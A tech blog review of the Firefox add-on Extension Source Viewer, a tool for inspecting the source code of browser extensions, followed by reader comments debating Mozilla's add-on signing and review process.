Extension Source Viewer for Firefox
Extension Source Viewer is a free browser add-on for the Firefox web browser that enables you to view the source code of Firefox add-ons and Chrome extensions.
It is recommended to verify that browser add-ons are legitimate before you install them in your browser.Â The reason for this is simple: browser extensions may record, transfer, or change what you do on the Internet.
Malicious extensions may grab passwords or sensitive information you enter, others may throw annoying ads on sites you visit, and a third kind may record your browsing history and create profiles to sell them to the highest bidder.
While you may get some reassurance by reading user reviews and ratings, or looking at the extensions track record, it may not be enough for the vast majority of extensions out there.
New extensions for instance may not have any ratings yet, and they don't have a track record either.
The only surefire way of making sure that an extension is legitimate and not malicious or problematic is to look at the source code.
Extension Source Viewer for Firefox
Extension Source Viewer for the Firefox web browser supports Firefox add-ons and Chrome extensions.
It indicates its functionality in Firefox's address bar when it detects an extension on a page, and may also be activated from the right-click context menu.
The main difference between functionality that the address bar icon and the right-click context menu entry offer is that the address bar icon supports downloading the extension as a zip file next to viewing its source directly in the browser.
The viewing of the source code works pretty much as you'd expect it to. Once you select the option, the source code of the extension is opened in a new tab.
Since it is made up of multiple files, you get a listing of all those files on the left to quickly go through them. Selecting a file displays its code on the right.
You may use the filter option on top of the file listing to find particular files quickly. One interesting option is the ability to filter certain types of files. You may hide images or locales for instance to reduce the number of files listed on the left.
The source code uses color coding, but that is about it. You may select and copy any code, which may come in handy if you want to research certain functions.
The links at the top right open the page of the extension on the official repository, download it to the local system, or load an open dialog that enables you to load another browser add-on to view its source.
Good news is that the add-on supports both Firefox add-ons and Chrome extensions. Since you may load a percentage of Chrome extensions in Firefox, it is good that the extension supports Chrome extensions as well.
The Firefox add-on works for the most part like its Chrome cousin Chrome Extension Source Viewer.
The source of an add-on published on AMO is available on its page / Version Information / View the source. This add-on IMO could be worthy for add-ons which have been removed from AMO and for external add-ons (non-signed? Hum…).
Whatever, even for non-specialists or Sunday coders viewing the source can provide indeed valuable information. I’ve more than once had a look at the add-on’s anatomy to figure out if and where any external calls were performed by the add-on. But adding an add-on to view other add-ons’ source seems to me slightly “hair splitting” … not to mention that a Firefox add-on has a simple zip format renamed xpi : reverse the extension and open it is a breeze, even for me.
This is unnecessary. FF extensions need to be signed to be installed and to sign them need to be reviewer by Mozilla.
It’s different from Chrome, Google does not check anything at all, that’s why malware and friends are everywhere there.
Signing is an automatic process, is not it?
Yes, signing is an automatic process, it does not require a code review.
Code review is automatic, too, like on Google Play for Android apps. If an extension is signed, I don’t think there is a case where it has not been reviewed as well. (Only exception could be for internal extensions made by businesses for their employees. Extensions that never leave an internal network are subjected to a different mechanism that I never bothered checking.)
Still, malware is not spyware, and it’s great to be able to check source code in readable format in just a few clicks. Can’t do that with smartphone apps.
There is an automatic code validation, but the review is a manual process. Add-ons on AMO should be reviewed, but it has nothing to do with the signing. That’s an important distinction because add-ons don’t need to be hosted on AMO. And a review can take a few days. You can share a link of a not yet reviewed add-on, so we can’t say that every add-on on AMO is reviewed. But add-ons with a green install button are reviewed for sure. ;)
True that there are signed add-ons elsewhere than on AMO itself.
For example this one, ‘Bookmark Favicon Changer’ developed by Sonthakit, fed up by Mozilla reviews for reasons he explains on his page but nevertheless signed (no way to avoid that) :
I guess we all give more importance to signing than to reviewing.
We were debating over Firefox’s WebExtensions’ new extension architecture here on Ghacks with the ‘The State of Mozilla Firefox’ article. Hopefully this new WebExtensions will defeat the reasons provided by the above mentioned developer.
Right, AMO has manual review, so indeed add-ons on AMO with the green button should be even safer than Google Play’s apps :)
But signed add-ons distributed outside of AMO have some level of guarantee too. How much is “some” I don’t know, one would need to check what exactly the verification algorithm is looking for. One of the advertised advantages of signing is that it protects people’s Firefox from misbehaving extensions bundled in programs that they install. So for that, the verification algorithm must check for more than just compatibility, it must check behaviour too.
Anyway here’s what Mozilla says about the process:
“For unlisted add-ons, files submitted for signing will go through an automated review process. If they pass this review, they are automatically signed and a download link is sent back to the developer. This process should normally take seconds. If the file doesn’t pass review, the developer will have the option to request a manual review, which should take less than two days. This is not the same process that currently applies to AMO add-ons, which has been typically slower.”
The average PC user (not a software developer) will not understand what the source code is doing.
Unneeded and most probably harvesting “addon”.
XPI File is nothing more than a ZIP File…
> The Firefox add-on works for the most part like its Chrome cousin Chrome Extension Source Viewer.
Not cousin, but more like identical twins! The Firefox version is implemented as a WebExtension itself (you can see the source at https://github.com/Rob–W/crxviewer).
I agree with Tom on this, no need for this addon, just use the page on AMO or download the file and extract it if the source code is not visible on AMO. One great thing about the AMO source code viewer is that it’s very easy to compare two versions of an addon, so if there’s a not-very-descriptive changelog for a new version you can quickly and very easily look at exactly what code-changes were made in the new version.